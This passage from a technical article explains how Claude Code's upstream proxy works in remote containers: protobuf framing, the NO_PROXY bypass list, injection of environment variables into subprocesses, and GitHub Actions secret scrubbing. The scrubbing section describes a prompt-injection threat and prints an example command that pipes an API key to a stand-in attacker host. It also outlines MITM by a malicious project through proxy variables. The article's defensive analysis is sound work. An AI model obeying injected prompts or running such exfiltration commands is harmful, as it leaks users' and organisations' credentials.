&lt;p&gt;Why hand-encode instead of using protobufjs? For a single-field bytes message, the hand encoding is 10 lines of code. A protobuf runtime library adds a dependency in the hot path — every byte of subprocess traffic passes through this encoder. The trade-off is clear: minimal code, no dependency, maximum throughput.&lt;/p&gt;

&lt;p&gt;Large payloads are chunked at 512KB boundaries before encoding. This matches the Envoy per-request buffer cap at the gateway. Week-1 use cases (Datadog API calls) won't hit this limit, but the chunking is designed for future workloads like &lt;code&gt;git push&lt;/code&gt; that could send megabytes through the tunnel.&lt;/p&gt;
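&lt;p&gt;The split itself is a one-liner. A sketch (the 512KB figure comes from the article; the function name is invented):&lt;/p&gt;

```python
CHUNK_SIZE = 512 * 1024  # matches the Envoy per-request buffer cap at the gateway


def chunk_payload(data: bytes, chunk_size: int = CHUNK_SIZE) -> list[bytes]:
    """Slice a payload at chunk_size boundaries; each slice is framed independently."""
    return [data[i:i + chunk_size] for i in range(0, len(data), chunk_size)]
```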




&lt;h2&gt;
  
  
  The NO_PROXY Bypass List
&lt;/h2&gt;

&lt;p&gt;Not all traffic should go through the proxy. The bypass list is carefully curated:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="nx"&gt;NO_PROXY&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;
    &lt;span class="err"&gt;#&lt;/span&gt; &lt;span class="nx"&gt;Loopback&lt;/span&gt;
    &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;localhost&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;127.0.0.1&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;::1&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;

    &lt;span class="err"&gt;#&lt;/span&gt; &lt;span class="nx"&gt;RFC1918&lt;/span&gt; &lt;span class="kr"&gt;private&lt;/span&gt; &lt;span class="nx"&gt;ranges&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="nx"&gt;AWS&lt;/span&gt; &lt;span class="nx"&gt;IMDS&lt;/span&gt;
    &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;169.254.0.0/16&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;10.0.0.0/8&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;172.16.0.0/12&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;192.168.0.0/16&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;

    &lt;span class="err"&gt;#&lt;/span&gt; &lt;span class="nx"&gt;Anthropic&lt;/span&gt; &lt;span class="nx"&gt;API&lt;/span&gt; &lt;span class="err"&gt;—&lt;/span&gt; &lt;span class="nx"&gt;three&lt;/span&gt; &lt;span class="nx"&gt;forms&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="nx"&gt;cross&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="nx"&gt;runtime&lt;/span&gt; &lt;span class="nx"&gt;compatibility&lt;/span&gt;
    &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;anthropic.com&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;.anthropic.com&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;*.anthropic.com&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;

    &lt;span class="err"&gt;#&lt;/span&gt; &lt;span class="nc"&gt;GitHub &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;already&lt;/span&gt; &lt;span class="nx"&gt;reachable&lt;/span&gt; &lt;span class="nx"&gt;directly&lt;/span&gt; &lt;span class="k"&gt;from&lt;/span&gt; &lt;span class="nx"&gt;CCR&lt;/span&gt; &lt;span class="nx"&gt;containers&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;github.com&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;api.github.com&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;*.github.com&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;*.githubusercontent.com&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;

    &lt;span class="err"&gt;#&lt;/span&gt; &lt;span class="nx"&gt;Package&lt;/span&gt; &lt;span class="nx"&gt;registries&lt;/span&gt;
    &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;registry.npmjs.org&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;pypi.org&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;files.pythonhosted.org&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;index.crates.io&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;proxy.golang.org&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;
&lt;span class="p"&gt;]&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Why Three Forms for Anthropic?
&lt;/h3&gt;

&lt;p&gt;Different runtimes parse NO_PROXY differently:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;*.anthropic.com&lt;/code&gt; — Bun, curl, and Go interpret &lt;code&gt;*&lt;/code&gt; as a glob wildcard&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;.anthropic.com&lt;/code&gt; — Python urllib/httpx treats a leading dot as a suffix match (strips the dot, matches &lt;code&gt;*.anthropic.com&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;anthropic.com&lt;/code&gt; — Apex domain fallback for runtimes that don't handle the above&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;All three are needed to cover the ecosystem of tools subprocesses might use.&lt;/p&gt;
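&lt;p&gt;Under a tolerant matcher, all three spellings collapse to the same host set. A simplified sketch of the common semantics (not any specific runtime's parser):&lt;/p&gt;

```python
def bypasses_proxy(host: str, no_proxy: list[str]) -> bool:
    """Approximate common NO_PROXY semantics: exact match, leading-dot
    suffix match, and '*.' glob treated as a suffix match."""
    host = host.lower()
    for entry in no_proxy:
        entry = entry.lower()
        if entry.startswith("*."):
            entry = entry[1:]          # "*.anthropic.com" -> ".anthropic.com"
        if entry.startswith("."):
            if host.endswith(entry):   # suffix match on subdomains
                return True
        elif host == entry:            # exact apex match
            return True
    return False
```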

&lt;h3&gt;
  
  
  Why Bypass the Anthropic API?
&lt;/h3&gt;

&lt;p&gt;The comment in the source is blunt: "the MITM breaks non-Bun runtimes." The proxy's MITM certificate is trusted by the merged CA bundle, but not all runtimes use &lt;code&gt;SSL_CERT_FILE&lt;/code&gt;. Python's &lt;code&gt;certifi&lt;/code&gt; package bundles its own CA store and ignores environment variables unless explicitly configured. A MITM'd connection to the Anthropic API from a Python subprocess would fail with &lt;code&gt;CERTIFICATE_VERIFY_FAILED&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;More importantly, the Anthropic API is Claude Code's own backend. There's no need for credential injection or traffic inspection on this path — the CLI already has its own authentication. Routing it through the proxy would add latency and failure modes for no benefit.&lt;/p&gt;

&lt;h3&gt;
  
  
  Why Bypass Package Registries?
&lt;/h3&gt;

&lt;p&gt;CCR containers already have direct network access to npm, PyPI, crates.io, and Go's module proxy. Routing package installs through the upstream proxy would add latency to &lt;code&gt;npm install&lt;/code&gt; and &lt;code&gt;pip install&lt;/code&gt; — commands the model runs frequently — for no security benefit. The registries don't need org credentials injected.&lt;/p&gt;




&lt;h2&gt;
  
  
  Subprocess Environment Injection
&lt;/h2&gt;

&lt;p&gt;The final layer connects everything. Every subprocess Claude Code spawns gets environment variables injected:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="kd"&gt;function&lt;/span&gt; &lt;span class="nf"&gt;subprocessEnv&lt;/span&gt;&lt;span class="p"&gt;():&lt;/span&gt;
    &lt;span class="err"&gt;#&lt;/span&gt; &lt;span class="nx"&gt;Get&lt;/span&gt; &lt;span class="nx"&gt;proxy&lt;/span&gt; &lt;span class="nf"&gt;vars &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;empty&lt;/span&gt; &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nx"&gt;proxy&lt;/span&gt; &lt;span class="nx"&gt;disabled&lt;/span&gt; &lt;span class="nx"&gt;or&lt;/span&gt; &lt;span class="nx"&gt;not&lt;/span&gt; &lt;span class="k"&gt;in&lt;/span&gt; &lt;span class="nx"&gt;CCR&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="nx"&gt;proxyEnv&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;getUpstreamProxyEnv&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

    &lt;span class="err"&gt;#&lt;/span&gt; &lt;span class="nx"&gt;If&lt;/span&gt; &lt;span class="nx"&gt;GHA&lt;/span&gt; &lt;span class="nx"&gt;secret&lt;/span&gt; &lt;span class="nx"&gt;scrubbing&lt;/span&gt; &lt;span class="nx"&gt;is&lt;/span&gt; &lt;span class="nx"&gt;enabled&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;strip&lt;/span&gt; &lt;span class="nx"&gt;sensitive&lt;/span&gt; &lt;span class="nx"&gt;vars&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nx"&gt;env&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;CLAUDE_CODE_SUBPROCESS_ENV_SCRUB&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="nx"&gt;env&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;copy&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;process&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;env&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="nx"&gt;env&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;merge&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;proxyEnv&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="nx"&gt;key&lt;/span&gt; &lt;span class="k"&gt;in&lt;/span&gt; &lt;span class="nx"&gt;SCRUB_LIST&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="k"&gt;delete&lt;/span&gt; &lt;span class="nx"&gt;env&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nx"&gt;key&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
            &lt;span class="k"&gt;delete&lt;/span&gt; &lt;span class="nx"&gt;env&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;INPUT_&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="nx"&gt;key&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;  &lt;span class="err"&gt;#&lt;/span&gt; &lt;span class="nx"&gt;GHA&lt;/span&gt; &lt;span class="nx"&gt;auto&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="nx"&gt;creates&lt;/span&gt; &lt;span class="nx"&gt;INPUT_&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nx"&gt;NAME&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nx"&gt;env&lt;/span&gt;

    &lt;span class="err"&gt;#&lt;/span&gt; &lt;span class="nx"&gt;Normal&lt;/span&gt; &lt;span class="k"&gt;case&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;process&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;env&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="nx"&gt;proxy&lt;/span&gt; &lt;span class="nx"&gt;overlay&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nf"&gt;merge&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;process&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;env&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;proxyEnv&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The proxy env function is registered lazily. The &lt;code&gt;subprocessEnv&lt;/code&gt; module has no static import of the upstream proxy module — this is deliberate. In non-CCR environments (local CLI, IDE integration), the proxy module graph (upstreamproxy + relay + WebSocket + FFI) is never loaded. The registration happens in &lt;code&gt;init&lt;/code&gt; only when &lt;code&gt;CLAUDE_CODE_REMOTE&lt;/code&gt; is set:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="err"&gt;#&lt;/span&gt; &lt;span class="nx"&gt;In&lt;/span&gt; &lt;span class="nx"&gt;init&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;only&lt;/span&gt; &lt;span class="nx"&gt;when&lt;/span&gt; &lt;span class="nx"&gt;running&lt;/span&gt; &lt;span class="k"&gt;in&lt;/span&gt; &lt;span class="nx"&gt;CCR&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
&lt;span class="nf"&gt;registerUpstreamProxyEnvFn&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;getUpstreamProxyEnv&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="nf"&gt;initUpstreamProxy&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  The GHA Secret Scrubbing Layer
&lt;/h3&gt;

&lt;p&gt;When running in GitHub Actions, a separate threat applies: prompt injection can exfiltrate secrets via shell expansion. A malicious prompt could trick the model into running &lt;code&gt;echo $ANTHROPIC_API_KEY | curl attacker.com -d @-&lt;/code&gt;. The subprocess environment scrubber removes 20+ sensitive variables:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Anthropic auth&lt;/strong&gt;: API keys, OAuth tokens, custom headers&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Cloud provider creds&lt;/strong&gt;: AWS secret keys, GCP credentials, Azure client secrets&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;GitHub Actions OIDC tokens&lt;/strong&gt;: Leaking these allows minting installation tokens — repo takeover&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Actions runtime tokens&lt;/strong&gt;: Cache poisoning via artifact/cache API — supply-chain pivot&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;OTEL headers&lt;/strong&gt;: Often carry &lt;code&gt;Authorization: Bearer&lt;/code&gt; tokens for monitoring backends&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The scrub list explicitly does NOT include &lt;code&gt;GITHUB_TOKEN&lt;/code&gt; and &lt;code&gt;GH_TOKEN&lt;/code&gt;. These are job-scoped tokens that expire when the workflow ends. Wrapper scripts need them to call the GitHub API, and their short lifetime limits the blast radius.&lt;/p&gt;

&lt;p&gt;The &lt;code&gt;INPUT_*&lt;/code&gt; variant deletion handles a GitHub Actions quirk: the &lt;code&gt;with:&lt;/code&gt; inputs in a workflow step are auto-duplicated as &lt;code&gt;INPUT_&amp;lt;NAME&amp;gt;&lt;/code&gt; environment variables. &lt;code&gt;INPUT_ANTHROPIC_API_KEY&lt;/code&gt; would survive the scrub of &lt;code&gt;ANTHROPIC_API_KEY&lt;/code&gt; without this.&lt;/p&gt;
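&lt;p&gt;The scrub plus the &lt;code&gt;INPUT_*&lt;/code&gt; twin deletion can be sketched as follows (the list is abbreviated to two entries here; the real one has 20+):&lt;/p&gt;

```python
SCRUB_LIST = ["ANTHROPIC_API_KEY", "AWS_SECRET_ACCESS_KEY"]  # abbreviated for illustration


def scrub_env(env: dict) -> dict:
    """Drop each sensitive variable and its GHA-injected INPUT_<NAME> duplicate."""
    clean = dict(env)
    for key in SCRUB_LIST:
        clean.pop(key, None)
        clean.pop("INPUT_" + key, None)  # `with:` inputs are auto-duplicated as INPUT_<NAME>
    return clean
```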

&lt;h3&gt;
  
  
  Child CLI Inheritance
&lt;/h3&gt;

&lt;p&gt;When Claude Code spawns a child CLI process (e.g., a subagent), the child can't re-initialize the relay — the token file was already unlinked. But the parent's relay is still running on localhost. The &lt;code&gt;getUpstreamProxyEnv&lt;/code&gt; function detects this case:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="kd"&gt;function&lt;/span&gt; &lt;span class="nf"&gt;getUpstreamProxyEnv&lt;/span&gt;&lt;span class="p"&gt;():&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nx"&gt;proxy&lt;/span&gt; &lt;span class="nx"&gt;not&lt;/span&gt; &lt;span class="nx"&gt;initialized&lt;/span&gt; &lt;span class="nx"&gt;locally&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="err"&gt;#&lt;/span&gt; &lt;span class="nx"&gt;Check&lt;/span&gt; &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nx"&gt;we&lt;/span&gt; &lt;span class="nx"&gt;inherited&lt;/span&gt; &lt;span class="nx"&gt;proxy&lt;/span&gt; &lt;span class="nx"&gt;vars&lt;/span&gt; &lt;span class="k"&gt;from&lt;/span&gt; &lt;span class="nx"&gt;a&lt;/span&gt; &lt;span class="nx"&gt;parent&lt;/span&gt; &lt;span class="nx"&gt;process&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nx"&gt;env&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;HTTPS_PROXY&lt;/span&gt; &lt;span class="nx"&gt;and&lt;/span&gt; &lt;span class="nx"&gt;env&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;SSL_CERT_FILE&lt;/span&gt; &lt;span class="nx"&gt;are&lt;/span&gt; &lt;span class="nx"&gt;both&lt;/span&gt; &lt;span class="kd"&gt;set&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="err"&gt;#&lt;/span&gt; &lt;span class="nx"&gt;Pass&lt;/span&gt; &lt;span class="nx"&gt;through&lt;/span&gt; &lt;span class="nx"&gt;parent&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;s proxy configuration
            return inherited proxy vars
        return {}

    # We own the relay — return our vars
    return {
        HTTPS_PROXY: "http://127.0.0.1:&amp;lt;port&amp;gt;",
        https_proxy: "http://127.0.0.1:&amp;lt;port&amp;gt;",
        NO_PROXY: &amp;lt;bypass list&amp;gt;,
        no_proxy: &amp;lt;bypass list&amp;gt;,
        SSL_CERT_FILE: "~/.ccr/ca-bundle.crt",
        NODE_EXTRA_CA_CERTS: "~/.ccr/ca-bundle.crt",
        REQUESTS_CA_BUNDLE: "~/.ccr/ca-bundle.crt",
        CURL_CA_BUNDLE: "~/.ccr/ca-bundle.crt",
    }
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Both lowercase and uppercase variants are set for each variable. Some tools read &lt;code&gt;https_proxy&lt;/code&gt;, others &lt;code&gt;HTTPS_PROXY&lt;/code&gt;. Setting both ensures universal coverage.&lt;/p&gt;

&lt;p&gt;Only HTTPS is proxied. The relay handles CONNECT (the method proxy-aware clients use to tunnel HTTPS) and nothing else. Plain HTTP has no credentials to inject, and routing it through the relay would just produce a 405 error.&lt;/p&gt;
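&lt;p&gt;The relay's method gate reduces to a single check. A sketch of the behavior described above, not the relay's actual code:&lt;/p&gt;

```python
def relay_status_for(method: str) -> int:
    """CONNECT establishes a tunnel; every other method is refused with 405."""
    return 200 if method == "CONNECT" else 405
```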




&lt;h2&gt;
  
  
  Security Boundaries
&lt;/h2&gt;

&lt;p&gt;The upstream proxy operates at the intersection of several trust boundaries:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The model can't read the token.&lt;/strong&gt; The file is unlinked before the agent loop starts. The heap is non-dumpable. The token never appears in environment variables.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Subprocesses can't reach arbitrary endpoints.&lt;/strong&gt; Traffic goes through the gateway, which can enforce allowlists and inject org credentials. The NO_PROXY list ensures local and already-authorized traffic bypasses the gateway.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The proxy env vars are classified as dangerous.&lt;/strong&gt; In Claude Code's environment variable security model, &lt;code&gt;HTTPS_PROXY&lt;/code&gt;, &lt;code&gt;SSL_CERT_FILE&lt;/code&gt;, and &lt;code&gt;NODE_EXTRA_CA_CERTS&lt;/code&gt; are NOT in the safe-vars list. Project-level settings files (&lt;code&gt;.claude/settings.json&lt;/code&gt;) can't set them without a trust dialog — a malicious project could otherwise redirect traffic to an attacker's proxy and supply an attacker's CA certificate, enabling MITM of all subprocess HTTPS traffic. Only the upstream proxy system and user-level config can set them.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Initialization fails open but fails loudly.&lt;/strong&gt; Every failure path logs a warning with the specific error. The session continues without the proxy, so users aren't blocked. But the debug logs make it clear why subprocess traffic isn't being proxied.&lt;/p&gt;




&lt;h2&gt;
  
  
  Design Trade-offs
&lt;/h2&gt;

&lt;p&gt;Several design decisions in the upstream proxy system reveal the constraints it operates under.&lt;/p&gt;

&lt;h3&gt;
  
  
  Why Fail-Open Everywhere?
&lt;/h3&gt;

&lt;p&gt;Every step of initialization — gate checks, token read, CA download, relay bind, prctl — fails open. If any step errors, the proxy is disabled and the session continues without it. This is the opposite of how most security systems work, where failure means "deny access."&lt;/p&gt;

&lt;p&gt;The reasoning: the upstream proxy is an &lt;strong&gt;infrastructure enhancement&lt;/strong&gt;, not a security gate. Its purpose is to inject credentials and log traffic for organizations. A session without the proxy still works — the agent can't reach org-internal services through the proxy, but it can still do everything else. Blocking the entire session because a CA endpoint was temporarily unreachable would be an availability regression for a feature the user didn't directly ask for.&lt;/p&gt;

&lt;p&gt;The fail-open contract is maintained end-to-end. The &lt;code&gt;init&lt;/code&gt; entry point wraps the entire &lt;code&gt;initUpstreamProxy()&lt;/code&gt; call in a try-catch that logs and continues. Even if the module itself throws an unexpected error, the session starts.&lt;/p&gt;
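&lt;p&gt;The wrapper amounts to a few lines. A sketch of the contract (names invented):&lt;/p&gt;

```python
import logging

log = logging.getLogger("upstreamproxy")


def init_fail_open(init_fn) -> bool:
    """Run an init step; on any error, log it and continue without the proxy."""
    try:
        init_fn()
        return True
    except Exception as err:  # deliberately broad: no failure may block the session
        log.warning("[upstreamproxy] init failed: %s; proxy disabled", err)
        return False
```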

&lt;h3&gt;
  
  
  Why No Test Suite?
&lt;/h3&gt;

&lt;p&gt;The upstream proxy has &lt;strong&gt;no dedicated test files&lt;/strong&gt;. This is unusual for a security-sensitive component. The relay's source even exports &lt;code&gt;startNodeRelay&lt;/code&gt; specifically so tests can exercise the Node path under Bun (with a comment explaining this), and the upstream proxy module exports &lt;code&gt;resetUpstreamProxyForTests()&lt;/code&gt; — the hooks are there, but no tests exist yet.&lt;/p&gt;

&lt;p&gt;The likely reason: the system is tightly coupled to infrastructure that's hard to simulate. The relay needs a WebSocket endpoint that speaks protobuf and responds with CONNECT establishment. The CA download hits a real HTTP endpoint. The prctl call needs Linux. The token lifecycle depends on tmpfs. Each piece works correctly in production but is expensive to mock in isolation. This is a testing debt that the exported test hooks suggest the team intends to pay down.&lt;/p&gt;

&lt;h3&gt;
  
  
  Why Hand-Coded Protobuf Instead of gRPC?
&lt;/h3&gt;

&lt;p&gt;The tunnel carries a single message type with a single bytes field. gRPC would add:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;A protobuf compiler step in the build pipeline&lt;/li&gt;
&lt;li&gt;A runtime library (~100KB+ for protobufjs)&lt;/li&gt;
&lt;li&gt;HTTP/2 framing that the L7 load balancer would need to support&lt;/li&gt;
&lt;li&gt;Code generation for a one-field message&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The hand-coded encoder is 10 lines. The decoder is 12 lines. Both are trivially auditable. The trade-off breaks clearly in favor of hand-coding for this specific use case.&lt;/p&gt;

&lt;h3&gt;
  
  
  Why Lazy Module Loading?
&lt;/h3&gt;

&lt;p&gt;The upstream proxy module graph includes WebSocket libraries, Bun FFI bindings, node:net, and the relay state machine. In non-CCR environments (local CLI, IDE integrations), none of this is needed. A static import would load it unconditionally — adding startup latency and memory overhead for every user, even though fewer than 1% run in CCR containers.&lt;/p&gt;

&lt;p&gt;The lazy-import pattern pushes this cost to zero for non-CCR users:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="err"&gt;#&lt;/span&gt; &lt;span class="nx"&gt;In&lt;/span&gt; &lt;span class="nx"&gt;init&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;only&lt;/span&gt; &lt;span class="nx"&gt;when&lt;/span&gt; &lt;span class="nx"&gt;CLAUDE_CODE_REMOTE&lt;/span&gt; &lt;span class="nx"&gt;is&lt;/span&gt; &lt;span class="kd"&gt;set&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
&lt;span class="nx"&gt;proxy&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;await&lt;/span&gt; &lt;span class="k"&gt;import&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;upstreamproxy&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="nf"&gt;registerUpstreamProxyEnvFn&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;proxy&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;getUpstreamProxyEnv&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="k"&gt;await&lt;/span&gt; &lt;span class="nx"&gt;proxy&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;initUpstreamProxy&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



